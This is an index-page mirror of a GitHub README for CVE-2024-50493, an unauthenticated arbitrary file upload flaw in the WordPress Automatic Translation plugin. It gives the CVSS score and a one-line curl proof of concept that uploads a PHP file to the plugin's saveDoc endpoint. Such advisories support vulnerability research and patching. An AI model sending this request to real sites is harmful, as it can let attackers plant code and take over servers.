Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-50493
Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload
https://github.com/randomrobbiebf/cve-2024-50493
Last synced: about 1 month ago
JSON representation
Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-50493
- Owner: RandomRobbieBF
- Created: 2024-11-10T08:17:41.000Z (about 1 month ago)
- Default Branch: main
- Last Pushed: 2024-11-10T08:18:28.000Z (about 1 month ago)
- Last Synced: 2024-11-10T09:20:58.882Z (about 1 month ago)
- Size: 1.95 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-50493
Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload# Description:
The Automatic Translation plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.```
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
```POC
---```
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"
```